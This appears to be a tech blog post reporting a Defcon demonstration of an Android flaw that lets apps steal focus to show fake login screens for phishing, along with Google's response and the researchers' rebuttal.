Every year, Defcon brings about some new concepts, hacks, vulnerabilities, and other digital tomfoolery. Sometimes it's all in good fun, but other times it's all too scary, which happens to be the case with a new class of Android malware that could allow for phishing attacks and pop-up ads alike.
Thanks to a design flaw in Android, there is a "feature" that allows an application to steal focus and pull itself into the foreground, bypassing the notification system entirely. Even more, the app can disable the use of the 'back' button to return the previously opened application, nearly locking you in to its interface.
Now, while this could be used as a legitimate feature in some apps, the negative aspects of such options far outweigh the good. In the example given at Defcon, a game was written with embedded phishing apps that would randomly steal focus -- apps made to look like Facebook, Amazon, Google Voice, and GMail. At this point, I'm sure you can already see where this is going; if an unsuspecting user sees a familiar interface pop into the foreground asking for sensitive data, then what reason would he or she not have to input their information? While the effects of having login credentials for Facebook or Email stolen can be troubling, consider what could happen if this malware was made to replicate that of a common bank app? The results could be devastating.
Naturally, Google responded to this finding, nearly brushing it off as if it were nothing.
Switching between applications is a desired capability used by many applications to encourage rich interaction between applications. We haven't seen any apps maliciously using this technique on Android Market and we will remove any apps that do.
Not happy with that retort, the researchers that discovered this potential threat fired back with a solid response:
Application switching is not the issue. The real issue is ability for other apps to identify which app is in the foreground and then decide to jump in front of that running app without the user giving it permission to do so. We also don't see how they could determine the difference between a malicious app or a legitimate one since they would both look almost identical until a user reports it to them as malicious. The 'wait until an app is reported bad before removing' stance is dangerous and will likely prove out to be a fruitless effort as attackers could post apps much faster than Google could identify and remove them from the Market.
Personally, I have never had an app steal the foreground in this manner, but moving forward, I guarantee that I will be wary of any app that utilizes this feature -- regardless of how legitimate the request seems.